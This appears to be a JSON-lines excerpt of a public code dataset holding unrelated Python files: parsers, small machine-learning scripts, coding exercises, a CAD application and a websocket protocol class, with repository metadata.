\"\"\"\n self.delimiter_pattern = needle_to_pattern(delimiter)\n self.inner_parser = parser(inner_parser)\n self.output_type = output_type\n self.opener_pattern = needle_to_pattern(opener)\n self.closer_pattern = needle_to_pattern(closer)\n\n def __call__(self, x: str) -> G:\n opener_match = self.opener_pattern.match(x)\n if not opener_match:\n raise ValueError(\"position 0, expected opener\")\n x = x[opener_match.end() :]\n raw_elements = self.delimiter_pattern.split(x)\n closer_matches = self.closer_pattern.finditer(raw_elements[-1])\n\n closer_match = None\n for closer_match in closer_matches: # noqa: B007\n pass\n if not closer_match:\n raise ValueError(\"expected string to end in closer\")\n elif closer_match.end() != len(raw_elements[-1]):\n raise ValueError(\n \"expected closer to match end of string, got unexpected suffix: \"\n + raw_elements[-1][closer_match.end() :]\n )\n\n raw_elements[-1] = raw_elements[-1][: closer_match.start()]\n elements = (self.inner_parser(r.strip()) for r in raw_elements)\n return self.output_type(elements)\n\n @classmethod\n def pair_wise_delimited(\n cls,\n pair_delimiter: Needle,\n key_value_delimiter: Needle,\n key_type: ParserInput[K],\n value_type: Union[ParserInput[V], Mapping[K, ParserInput[V]]],\n output_type: Callable[[Iterator[Tuple[K, V]]], G] = _duplicate_avoiding_dict, # type: ignore[assignment]\n *,\n key_first: bool = True,\n **kwargs: Any,\n ) -> Parser[G]:\n \"\"\"\n Create a CollectionParser that aggregates to key-value pairs.\n :param pair_delimiter: The separator between different key-value 
pairs.\n :param key_value_delimiter: The separator between each key and value.\n :param key_type: The parser for key elements.\n :param value_type: The parser for value elements. Can also be a mapping, parsing each key under a different\n parser.\n :param output_type: The tuple aggregator function. Defaults to a duplicate-checking dict.\n :param key_first: If set to false, will evaluate the part behind the key-value separator as a value.\n :param kwargs: forwarded to `CollectionParser.__init__`\n \"\"\"\n key_value_delimiter = needle_to_pattern(key_value_delimiter)\n key_parser = parser(key_type)\n get_value_parser: Callable[[K], Parser]\n if isinstance(value_type, Mapping):\n\n @lru_cache(None)\n def get_value_parser(key: K) -> Parser[V]:\n return parser(value_type[key])\n else:\n _value_parser = parser(value_type)\n\n def get_value_parser(key: K) -> Parser[V]:\n return _value_parser\n\n def combined_parser(s: str) -> Any:\n split = key_value_delimiter.split(s, maxsplit=2)\n if len(split) != 2:\n raise ValueError(f\"expecting key-value pair, got {s}\")\n k, v = split\n if not key_first:\n k, v = v, k\n key = key_parser(k)\n value = get_value_parser(key)(v)\n return key, value\n\n return cls(pair_delimiter, combined_parser, output_type, **kwargs) # type: ignore[arg-type]\n\n\nclass NoFallback(Enum):\n no_fallback = auto()\n\n\nno_fallback = NoFallback.no_fallback\n\nCasesInput = Union[Iterable[Tuple[Needle, T]], Mapping[str, T], Type[Enum]]\nCasesInputIgnoreCase = Union[Iterable[Tuple[str, T]], Mapping[str, T], Type[Enum]]\n\n\nclass MatchParser(Generic[T]):\n @classmethod\n def _ensure_case_unique(cls, matches: Iterable[str]):\n seen_cases = set()\n for k in matches:\n key = k.lower()\n if key in seen_cases:\n raise ValueError(f\"duplicate case-invariant key {k}\")\n seen_cases.add(key)\n\n @classmethod\n def _cases(cls, x: CasesInput, ignore_case: bool) -> Iterable[Tuple[Pattern[str], T]]:\n if isinstance(x, Mapping):\n if ignore_case and __debug__:\n cls._ensure_case_unique(x.keys())\n return cls._cases(x.items(), ignore_case)\n if isinstance(x, type) and issubclass(x, Enum):\n return cls._cases(x.__members__, ignore_case)\n flags = _no_regex_flags\n if ignore_case:\n flags |= re.IGNORECASE\n return ((needle_to_pattern(n, flags), v) for n, v in x)\n\n def __init__(self, cases: CasesInput, fallback: Union[T, NoFallback] = no_fallback):\n cases_inp = self._cases(cases, ignore_case=False)\n if fallback is not no_fallback:\n cases_inp = chain(cases_inp, [(re.compile(\".*\"), fallback)])\n self.candidates = [(needle_to_pattern(n), v) for n, v in cases_inp]\n\n @classmethod\n def case_insensitive(\n cls, cases: CasesInputIgnoreCase, fallback: Union[T, NoFallback] = no_fallback\n ) -> MatchParser[T]:\n cases_inp = cls._cases(cases, ignore_case=True)\n return cls(cases_inp, fallback)\n\n def __call__(self, x: str) -> T:\n for pattern, value in self.candidates:\n if pattern.fullmatch(x):\n return value\n raise ValueError(f\"no match for {x}\")\n\n\nLookupCases = Union[Iterable[Tuple[str, T]], Mapping[str, T], Type[Enum]]\n\n\nclass LookupParser(Generic[T]):\n def __init__(\n self, lookup: LookupCases, fallback: Union[T, NoFallback] = no_fallback, *, _case_sensitive: bool = True\n ):\n cases: Iterable[Tuple[str, T]]\n if isinstance(lookup, Mapping):\n cases = lookup.items()\n elif isinstance(lookup, type) and issubclass(lookup, Enum):\n cases = lookup.__members__.items() # type: ignore[assignment]\n else:\n cases = lookup\n\n if _case_sensitive:\n self.lookup = dict(cases)\n else:\n self.lookup = 
{k.lower(): v for k, v in cases}\n self.fallback = fallback\n self.case_sensitive = _case_sensitive\n\n @classmethod\n def case_insensitive(cls, lookup: Mapping[str, T], fallback: Union[T, NoFallback] = no_fallback) -> LookupParser[T]:\n return cls(lookup, fallback, _case_sensitive=False)\n\n def __call__(self, x: str) -> T:\n if not self.case_sensitive:\n key = x.lower()\n else:\n key = x\n try:\n return self.lookup[key]\n except KeyError as e:\n if self.fallback is no_fallback:\n raise ValueError(f\"no match for {x}\") from e\n return self.fallback\n\n\nparser_special_superclasses[Enum] = LookupParser.case_insensitive # type: ignore[assignment]\n","repo_name":"bentheiii/envolved","sub_path":"envolved/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":12226,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"26529238589","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score,recall_score,precision_score,f1_score\n\nif __name__=='__main__':\n pddata_train=pd.read_csv('.....',header=None)\n pddata_test=pd.read_csv('......',header=None)\n x_train=pddata_train.loc[:,pddata_train.columns!=64]\n y_train=pddata_train.loc[:,pddata_train.columns==64]\n\n x_train=np.array(x_train)\n images_train=x_train.reshape([-1,8,8])\n\n x_test= pddata_test.loc[:, pddata_train.columns != 64]\n y_test = pddata_test.loc[:, pddata_train.columns == 64]\n\n x_test = np.array(x_test)\n images_test = x_test.reshape([-1, 8, 8])\n plt.figure(figsize=(100,50))\n for index,image in enumerate(images_train[:16]):\n plt.subplot(4,8,index+1)\n plt.imshow(image,cmap=plt.cm.gray_r,interpolation='nearest')\n plt.title('the true number is %d'%(y_train.loc[index]))\n for index,image in enumerate(images_test[:16]):\n plt.subplot(4,8,index+17)\n plt.imshow(image,cmap=plt.cm.gray_r,interpolation='nearest')\n plt.title('the true number is %d'%(y_test.loc[index]))\n plt.show()\n\n clf=SVC(C=1,kernel='rbf',gamma=0.001)\n clf.fit(x_train,y_train.values.ravel())\n y_hat=clf.predict(x_test)\n accuracy=accuracy_score(y_test,y_hat)\n print('the accuracy is %f'%(accuracy) )\n plt.figure(figsize=(100,50))\n y_hat_err=y_hat[y_hat!=y_test.values.ravel()]\n y_test_err=y_test[y_hat!=y_test.values.ravel()].values.ravel()\n err_images=images_test[y_hat!=y_test.values.ravel()]\n\n for index,err_image in enumerate(err_images):\n\n plt.subplot(4,8,index+1)\n plt.imshow(err_image,cmap=plt.cm.gray_r,interpolation='nearest')\n plt.title('y_hat=%d, y=%d'%(y_hat_err[index],y_test_err[index]))\n\n plt.show()\n\n\n\n\n\n\n\n\n\n","repo_name":"duanluyun/HandWritten_Digit_Recoganition","sub_path":"Support Vecotor Machine/HandWritenDigitalRecoganize.py","file_name":"HandWritenDigitalRecoganize.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40114101831","text":"meta = 10000\nvendas = [\n ['João', 15000],\n ['Julia', 27000],\n ['Marcus', 9900],\n ['Maria', 3750],\n ['Ana', 10300],\n ['Alon', 7870],\n]\nmeta_batida = []\n\nfor venda in vendas:\n if venda[1] >= meta:\n meta_batida.append(venda)\n\n# print(meta_batida)\nprint(\"{:.0%} of the salespeople hit the target\".format(len(meta_batida)/len(vendas)))\n\n# ------------------\n# calculation done directly on the list\nqtde_vendedores_acima = 0\n\nfor venda in vendas:\n if venda[1] >= meta:\n qtde_vendedores_acima += 
1\n\nprint('{:.0%} of the salespeople hit the target'.format(qtde_vendedores_acima / len(vendas)))","repo_name":"Rayron2012/HSTG_Treinamentos","sub_path":"Exercicios/Exercicios de For 2.py","file_name":"Exercicios de For 2.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73950422886","text":"import time\n\nimport belissiconsole as bc\n\n\ndef main():\n # a = bc.rainbow(\"🌈 THIS SHOULD BE A RAINBOW 🌈\")\n # time.sleep(5)\n # a.stop()\n\n bc.rainbow_print(\"WOW SO PRETTY ✨\")\n bc.rainbow_print(\"WOW SO PRETTY 🚀\")\n bc.rainbow_print(\"WOW SO PRETTY 🌈\")\n bc.rainbow_print(\"WOW SO PRETTY 🌟\")\n\n a = bc.rainbow(\"🌈 THIS SHOULD BE A RAINBOW 🌈\")\n time.sleep(3)\n a.stop()\n\n a = bc.rainbow(\"🌈 This tests 🌈\\n🌈 multiple lines 🌈\")\n time.sleep(3)\n a.stop()\n\n a = bc.rainbow(\"\\n\".join(\"a lot of lines, this might lag\" for _ in range(20)))\n time.sleep(5)\n a.stop()\n\n a = bc.rainbow(\"this should flash very fast\", speed=10)\n time.sleep(5)\n a.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Belissimo-T/belissiconsole","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39156760330","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport data_reader\nfrom model import LeNet\nimport os\nfrom scipy import ndimage\nfrom skimage.transform import resize\nfrom skimage.data import imread\nfrom skimage import color\n\ntraining_file = 'data/train.p'\nvalidation_file = 'data/valid.p'\ntesting_file = 'data/test.p'\n\nis_debug = True\n\ndata = data_reader.data(training_file, validation_file, testing_file)\ndata.print_data_info()\n\n# according to the info we know that there are 43 classes of signs\n\n# use a dictionary to manage the key-label mapping\nlabel_dict = {}\nwith open('signnames.csv', 'r') as f:\n lines = f.readlines()\n for line in lines[1:]:\n tmp = line.strip('\\n')\n tmp = tmp.split(',')\n label_dict[tmp[0]] = tmp[1]\n f.close()\n\n\ndef subplot_show(img_list, label_list, gray=False):\n \"\"\"\n show 16 pictures\n the img_list must be a list with 16 images\n \"\"\"\n for i in range(len(img_list)):\n plt.subplot(4, 4, i + 1)\n plt.title(label_dict[str(int(label_list[i]))])\n if gray is True:\n plt.imshow(img_list[i], cmap='gray')\n else:\n plt.imshow(img_list[i])\n plt.show()\n\n# # the original images\n# subplot_show(data.test_x[:4])\n\n# images after normalization and conversion to gray scale\nif is_debug:\n subplot_show(data.test_x[:16], data.test_y[:16], gray=True)\n\nmodel = LeNet(data)\n\n# the training stage\nnum_epoch = 20\nbatch_size = 128\nsave_dir = 'model_save_dir'\nnum_step = int(np.round(data.n_train/batch_size))\nis_training = False\n\nif not os.path.exists(save_dir):\n os.mkdir(save_dir)\nsave_path = os.path.join(save_dir, 'convnet_model.ckpt')\n\n\ndef outputFeatureMap(image_input, sess, tf_activation, activation_min=-1, activation_max=-1 ,plt_num=1):\n # Here make sure to preprocess your image_input in a way your network expects\n # with size, normalization, etc if needed\n # image_input =\n # Note: x should be the same name as your network's tensorflow data placeholder variable\n # If you get an error tf_activation is not defined it may be having trouble accessing the variable from inside a function\n image_input = np.reshape(image_input, [1, 32, 32])\n activation = 
tf_activation.eval(session=sess, feed_dict={model.x_placeholder:image_input})\n featuremaps = activation.shape[3]\n plt.figure(plt_num, figsize=(15, 15))\n for featuremap in range(featuremaps):\n plt.subplot(6,8, featuremap+1) # sets the number of feature maps to show on each row and column\n plt.title('FeatureMap ' + str(featuremap)) # displays the feature map number\n if activation_min != -1 & activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin =activation_min, vmax=activation_max, cmap=\"gray\")\n elif activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmax=activation_max, cmap=\"gray\")\n elif activation_min !=-1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin=activation_min, cmap=\"gray\")\n else:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", cmap=\"gray\")\n\n\nwith tf.Session(graph=model.graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n if is_training:\n for epoch in range(num_epoch):\n for step in range(num_step):\n batch_x, batch_y = data.next_batch(batch_size)\n\n # define a feed dict to input minibatch\n feed_dict = {model.x_placeholder: batch_x, model.y_placeholder: batch_y, model.keep_p:0.5}\n\n sess.run(model.train_op, feed_dict=feed_dict)\n\n # eval stage\n val_loss, val_acc, merge, g_step = sess.run([model.loss, model.accuracy, model.merge, model.global_step],\n feed_dict={model.x_placeholder:data.val_x,\n model.y_placeholder:data.val_y,\n model.keep_p:1.0})\n # add some training info to summary file\n model.summary_writer.add_summary(merge, global_step=epoch)\n\n print('validation loss at epoch %d: %f' % (epoch, val_loss))\n print('validation accuracy at epoch %d: %f' % (epoch, val_acc))\n\n model.saver.save(sess, save_path, global_step=epoch)\n\n # test stage\n print('Test accuracy:', model.accuracy.eval(\n feed_dict={model.x_placeholder: data.test_x, model.y_placeholder: data.test_y, model.keep_p:1.0}), '%')\n\n else:\n # load the pre-trained model and classify the images from web\n model.saver.restore(sess, save_path + '-19')\n # read the images and labels\n path_list = os.listdir('web_imgs')\n imgs_list = []\n imgs_arr = np.zeros([6, 32, 32])\n label_arr = np.zeros([6])\n for item in path_list:\n imgs_list.append(imread(os.path.join('web_imgs', item)))\n for i, item in enumerate(imgs_list):\n item = (item - 128.) 
/ 128.\n item = color.rgb2gray(item)\n imgs_arr[i, :, :] = resize(item, (32, 32))\n for i, item in enumerate(path_list):\n item = item.split('.')[0]\n item = int(item)\n label_arr[i] = item\n # run the pre-trained model to predict\n output, acc, loss, top_k = sess.run([model.output, model.accuracy, model.loss, model.top_k], feed_dict={model.x_placeholder:imgs_arr,\n model.y_placeholder:label_arr,\n model.keep_p:1.0})\n\n print(top_k)\n\n print('the predict accuracy of web images is:', str(acc))\n predict = np.argmax(output, 1)\n for i in range(len(imgs_arr)):\n plt.subplot(2, 3, i + 1)\n plt.title('predict:'+label_dict[str(int(predict[i]))]+'\\n truth:'+label_dict[str(int(label_arr[i]))])\n plt.imshow(imgs_arr[i, :, :], cmap='gray')\n plt.show()\n\n\n\n\n\n\n\n","repo_name":"lixiyun98/self-driving-computer-vision","sub_path":"traffic_signs_classifier.py","file_name":"traffic_signs_classifier.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16408291131","text":"from sqlalchemy import create_engine,Column,Integer,String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n# create the engine that connects to the database\nengine = create_engine(\n 'mysql+pymysql://root:tedu.cn@127.0.0.1/tedu2006?charset=utf8',\n encoding = 'utf8',\n echo = True\n)\n\nBase = declarative_base()\nSession = sessionmaker(bind=engine)\n\nclass Department(Base):\n __tablename__ = 'departments'\n id = Column(Integer,primary_key=True)\n dep_name = Column(String(20),unique=True)\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)","repo_name":"pgj-ctrl/pgj-Repository","sub_path":"py02/day4/dbconn1.py","file_name":"dbconn1.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6705251218","text":"'''\nGiven four integer arrays nums1, nums2, nums3, and nums4 all of length n, return the number \nof tuples (i, j, k, l) such that:\n\n0 <= i, j, k, l < n\nnums1[i] + nums2[j] + nums3[k] + nums4[l] == 0\n'''\n\n\nclass Solution:\n def fourSumCount(self, nums1: list[int], nums2: list[int], nums3: list[int], nums4: list[int]) -> int:\n hashmap = dict()\n for n1 in nums1:\n for n2 in nums2:\n hashmap[n1+n2] = hashmap.get(n1+n2, 0) + 1\n count = 0\n for n3 in nums3:\n for n4 in nums4:\n k = 0-(n3+n4)\n if k in hashmap:\n count += hashmap[k]\n return count","repo_name":"Yutong1996/CS5800-Algorithm-Homework","sub_path":"leetcode/4sum_2.py","file_name":"4sum_2.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12852947627","text":"#This function takes two points as input and returns the distance between them\ndef distanceCalculator(point1,point2):\n return ((point1[0]-point2[0])**2+(point1[1]-point2[1])**2)**0.5\n\n#This function takes a cluster of points as an input and calculates and returns their mean\ndef mean(cluster):\n x = sum([i[0] for i in cluster])/len(cluster)\n y = sum([i[1] for i in cluster])/len(cluster)\n return (x,y)\n\ndataSet = [(0,0),(1,0),(1,1),(0,1),(-1,0)]\ncentroid1 = (1,0)\ncentroid2 = (1,1)\n\n#This loop runs twice to check whether we get the same clusters and centroids in the second\n#iteration as we got in the first iteration.\nfor i in range(0,2):\n print(\"\\nIteration number {}\\n\".format(i+1))\n cluster1 = []\n cluster2 = []\n #This loop runs for every point in the 
dataset and compares the distance between each point and \n #the centroid of each cluster, and saves the point in the cluster whose centroid is nearest to it.\n for j in range(0,len(dataSet)):\n if distanceCalculator(dataSet[j],centroid1)<=distanceCalculator(dataSet[j],centroid2):\n cluster1.append(dataSet[j])\n else:\n cluster2.append(dataSet[j])\n centroid1 = mean(cluster1)\n centroid2 = mean(cluster2)\n print(\"Cluster 1 : \",cluster1)\n print(\"Cluster 2 : \",cluster2)\n print(\"Centroid 1 : \",centroid1)\n print(\"Centroid 2 : \",centroid2)","repo_name":"usmanshouk/Python-Projects","sub_path":"Clustering Algorithm/clusteringAlgorithm.py","file_name":"clusteringAlgorithm.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16978175615","text":"import os\n\nclass Validator():\n\t\"\"\"\n\tValidates the cmd args and data\n\t\"\"\"\n\tPATH = 'raw_data/'\n\n\tdef __init__(self, player1, player2):\n\t\tself.player1 = player1\n\t\tself.player2 = player2\n\t\tpass\n\n\n\tdef isValidEntries(self):\n\t\t\"\"\"\n\t\tchecks the raw_data/ dir to see if both players' data files are present\n\t\t\"\"\"\n\t\tfile_names = os.listdir(Validator.PATH)\n\t\tnames = [name.lower()[:-4] for name in file_names]\n\t\t\n\t\tnot_founds = []\n\t\tif self.player1.lower() not in names:\n\t\t\tnot_founds.append(self.player1)\t\n\t\t\n\t\tif self.player2.lower() not in names:\n\t\t\tnot_founds.append(self.player2)\n\n\t\tif len(not_founds) == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\tfor player in not_founds:\n\t\t\t\tprint(player + \"'s data file is not found in 'raw_data/' directory. \"\n\t\t\t\t\t\"Double check that it's there, and that it was entered correctly.\")\n\t\t\treturn False\n\n\tdef constructRawData(self):\n\t\t\"\"\"\n\t\tcan only be run after isValidEntries() is True\n\t\t\"\"\"\n\t\tself.player1_raw_data = []\n\t\tself.player2_raw_data = []\n\t\tPLAYER1_PATH = Validator.PATH + self.player1 + '.txt'\n\t\tPLAYER2_PATH = Validator.PATH + self.player2 + '.txt'\n\n\t\twith open(PLAYER1_PATH, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tself.player1_raw_data.append(line.strip())\n\n\t\twith open(PLAYER2_PATH, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tself.player2_raw_data.append(line.strip())\n\n\tdef isValidData(self):\n\t\t\"\"\"method ensures that both users' raw data is valid,\n\t\ttested by looking at the first five characters of each entry\"\"\"\n\t\t### player 1\n\t\tfor line in self.player1_raw_data:\n\t\t\tif not line[0:5] == 'surf_':\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t### player 2\n\t\tfor entry in self.player2_raw_data:\n\t\t\tif not entry[0:5] == 'surf_':\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t### if all passes\n\t\treturn True\n\n\tdef isSyncedData(self):\n\t\t\"\"\"method tests that the entry data for both users is in sync with one another\"\"\"\n\t\tplayer1s_map_completes = []\n\t\tplayer2s_map_completes = []\n\t\tshared_entries = []\n\n\t\tfor entry in self.player1_raw_data:\n\t\t\tif entry.split(' ')[0] in [entry.split(' ')[0] for entry in self.player2_raw_data]:\n\t\t\t\tshared_entries.append(entry.split(' ')[0])\n\n\n\t\tfor entry in self.player1_raw_data:\n\t\t\tmap_ = entry.split(' ')[0]\n\t\t\tif map_ in 
shared_entries:\n\t\t\t\tdenominator = entry.split('/')[-1]\n\t\t\t\tplayer2s_map_completes.append(denominator)\n\n\n\t\tif sorted(player1s_map_completes) == sorted(player2s_map_completes):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\n\t# def __str__(self):\n\t# \t\"\"\" \"\"\"\n\t# \ts1 = self.isValidEntries()\n\t# \ts2 = self.isValidData()\n\t# \ts3 = self.isSyncedData()\n\n\t# \treturn \"\"\"\n\t# isValidEntries() --> %r\n\t# isValidData() --> %r\n\t# isSyncedDat() --> %r\n\t# \t\"\"\" % (s1, s2, s3)\n\n","repo_name":"al1Null/surf-compare","sub_path":"Validator.py","file_name":"Validator.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72631104484","text":"\n\ntc = [None, False, False, False, True, True]\n\nclass SVNRepo:\n @classmethod\n def isBadVersion(cls, id):\n return tc[id]\n\ndef fbv(v):\n l, r = 1, v\n while r > l:\n m = l + (r - l) // 2\n if SVNRepo.isBadVersion(m):\n r = m\n else:\n l = m + 1\n return l\n\nif __name__ == '__main__':\n print(fbv(5))\n","repo_name":"clarencenhuang/programming-challenges","sub_path":"lintcode/first_bad_version.py","file_name":"first_bad_version.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71574849125","text":"import os\nimport sys\ncad_dir = os.path.dirname(os.path.realpath(__file__))\npycad_dir = os.path.realpath(cad_dir + '/../PyCAD')\nsys.path.append(pycad_dir)\nimport wx\nimport cad\nimport geom\n\nfrom SolidApp import SolidApp # from CAD\nfrom InputMode import InputMode\nfrom Ribbon import RB\nfrom Ribbon import Ribbon\nfrom Ribbon import GrayedButton\n\nfrom points import Points\nfrom points import type as points_type\n\n\nclass PointEditing(InputMode):\n def __init__(self, front):\n InputMode.__init__(self)\n # front is True or False ( for rear )\n self.front = front\n self.points = None\n \n def GetTitle(self):\n return 'Point Editing ' + ('Front' if self.front else 'Rear')\n \n def GetHelpText(self):\n return 'Drag on ' + ('Blue' if self.front else 'Red' ) + ' curve to modify it'\n \n def OnMouse(self, event):\n if event.Moving():\n if event.leftDown:\n v = wx.GetApp().GetViewport()\n p = cad.Digitize(cad.IPoint(event.x, event.y))\n self.points.ModifyAtPoint(p.point, self.front)\n\n v.need_update = True\n v.need_refresh = True\n wx.GetApp().frame.graphics_canvas.Refresh() \n \n if event.GetWheelRotation() != 0:\n wx.GetApp().GetViewport().OnWheelRotation(event.wheelRotation, event.x, event.y)\n\nfront_editing = PointEditing(True)\nrear_editing = PointEditing(False)\n \nclass CadApp(SolidApp):\n def __init__(self):\n self.cad_dir = cad_dir\n SolidApp.__init__(self)\n \n def GetAppTitle(self):\n return 'ParaGame Point List Editing Software'\n \n def GetAppConfigName(self):\n return 'ParaGameCAD'\n \n def RegisterObjectTypes(self):\n SolidApp.RegisterObjectTypes(self)\n self.RegisterImportFileTypes(['points'], 'Points Files', ImportPointsFile)\n self.RegisterExportFileTypes(['points'], 'Points Files', ExportPointsFile)\n\n def AddExtraRibbonPages(self, ribbon):\n SolidApp.AddExtraRibbonPages(self, ribbon)\n \n save_bitmap_path = self.bitmap_path\n self.bitmap_path = cad_dir\n\n panel = RB.RibbonPanel(ribbon.main_page, wx.ID_ANY, 'Point', ribbon.Image('points'))\n toolbar = RB.RibbonButtonBar(panel)\n Ribbon.AddToolBarTool(toolbar,'Front', 'front', 'Edit Front Points', self.OnFrontEditButton)\n 
Ribbon.AddToolBarTool(toolbar,'Rear', 'rear', 'Edit Rear Points', self.OnRearEditButton)\n Ribbon.AddToolBarTool(toolbar,'Game', 'game', 'Run Game', self.OnGameButton)\n \n ribbon.main_page.Realize()\n\n self.bitmap_path = save_bitmap_path\n \n def OnEdit(self, front):\n editing = front_editing if front else rear_editing\n editing.points = None\n doc = cad.GetApp()\n object = doc.GetFirstChild()\n while object:\n if object.GetType() == points_type:\n editing.points = object\n break\n self.SetInputMode(editing)\n \n def OnFrontEditButton(self, event):\n self.OnEdit(True)\n \n def OnRearEditButton(self, event):\n self.OnEdit(False)\n \n def OnGameButton(self, event):\n ExportPointFilePath('line_lengths.points')\n os.system('\"C:\\\\Users\\\\Dan Heeks\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python36-32\\\\python\" game.py /i')\n\ndef ImportPointsFile():\n points = Points()\n points.points = eval( open(cad.GetFilePathForImportExport(), \"r\").read() )\n cad.AddUndoably(points)\n \ndef ExportPointFilePath(path):\n f = open(path, 'w')\n\n doc = cad.GetApp()\n object = doc.GetFirstChild()\n while object:\n if object.GetType() == points_type:\n f.write(str(object.points) + '\\n')\n object = doc.GetNextChild()\n f.close()\n\ndef ExportPointsFile():\n ExportPointFilePath(cad.GetFilePathForImportExport())\n","repo_name":"danheeks/ParaGame","sub_path":"CadApp.py","file_name":"CadApp.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40495167052","text":"#STEP 1\ncollegeAddress = {\n'Building Name': 'Ammons Hall',\n'Street': '711 Oval Dr',\n'City': 'Fort Collins',\n'State': 'Colorado',\n'Zip Code': 80523\n}\n\n#STEP 2\nbuilding2Address = {'Building Name': 'Ammons Hall',\n'Street': '711 Oval Dr',\n'City': 'Fort Collins',\n'State': 'Colorado',\n'Zip Code': 80523}\n\nbuilding3Address = {'Building Name': 'Ammons Hall',\n'Street': '711 Oval Dr',\n'City': 'Fort Collins',\n'State': 'Colorado',\n'Zip Code': 80528}\n\ndictionaryOfAddresses = {\n'College Address': collegeAddress,\n'Building 2 Address': building2Address,\n'Building 3 Address': building3Address}\n\n\n# for you to test your dictionary of dictionaries\nprint(dictionaryOfAddresses)\n\n# should output Fort Collins, feel free to change for testing purposes\nprint(dictionaryOfAddresses['College Address']['City'])","repo_name":"JakeAum/CS152-Coursework","sub_path":"dicitonaries.py","file_name":"dicitonaries.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17337360728","text":"import asyncio\nimport logging\n\nimport websockets\nfrom websockets.exceptions import ConnectionClosed\nfrom websockets.framing import OP_CLOSE, OP_TEXT, encode_data, parse_close\nfrom websockets.protocol import State\n\nlogger = logging.getLogger(__name__)\n\n\nclass SCSocketServerProtocol(websockets.WebSocketServerProtocol):\n ping_key = \"ping\"\n\n async def ping(self, data=None):\n await self.ensure_open()\n if data is None:\n data = \"#1\"\n if data is not None:\n data = encode_data(data)\n\n # Protect against duplicates if a payload is explicitly set.\n if self.ping_key in self.pings:\n raise ValueError(\"already waiting for a pong with the same data\")\n self.pings[self.ping_key] = self.loop.create_future()\n\n await self.write_frame(True, OP_TEXT, data)\n\n return asyncio.shield(self.pings[self.ping_key])\n\n async def pong(self, data=None):\n await 
self.ensure_open()\n if data is None:\n data = \"#2\"\n if data is not None:\n data = encode_data(data)\n await self.write_frame(True, OP_TEXT, data)\n\n async def read_data_frame(self, max_size):\n \"\"\"\n Read a single data frame from the connection.\n Process control frames received before the next data frame.\n Return ``None`` if a close frame is encountered before any data frame.\n \"\"\"\n # 6.2. Receiving Data\n while True:\n frame = await self.read_frame(max_size)\n\n # 5.5. Control Frames\n if frame.opcode == OP_CLOSE:\n # 7.1.5. The WebSocket Connection Close Code\n # 7.1.6. The WebSocket Connection Close Reason\n self.close_code, self.close_reason = parse_close(frame.data)\n try:\n # Echo the original data instead of re-serializing it with\n # serialize_close() because that fails when the close frame\n # is empty and parse_close() synthesizes a 1005 close code.\n await self.write_close_frame(frame.data)\n except ConnectionClosed:\n # It doesn't really matter if the connection was closed\n # before we could send back a close frame.\n pass\n return None\n\n elif frame.opcode == OP_TEXT:\n # PING\n if frame.data == b\"#1\":\n # Answer pings.\n logger.debug(\n \"%s: %s - received ping, sending pong: %s\",\n self.remote_address,\n self.side,\n frame.data or \"[empty]\",\n )\n await self.pong()\n continue\n # PONG\n elif frame.data == b\"#2\":\n # Acknowledge pings on solicited pongs.\n if self.ping_key in self.pings:\n logger.debug(\n \"%s: %s - received solicited pong: %s\",\n self.remote_address,\n self.side,\n frame.data or \"[empty]\",\n )\n # Acknowledge all pings up to the one matching this pong.\n ping = self.pings[self.ping_key]\n if not ping.done():\n ping.set_result(None)\n del self.pings[self.ping_key]\n else:\n logger.debug(\n \"%s - received unsolicited pong: %s\",\n self.side,\n frame.data or \"[empty]\",\n )\n continue\n\n return frame\n\n def abort_pings(self):\n \"\"\"\n Raise ConnectionClosed in pending keepalive pings.\n They'll never receive a 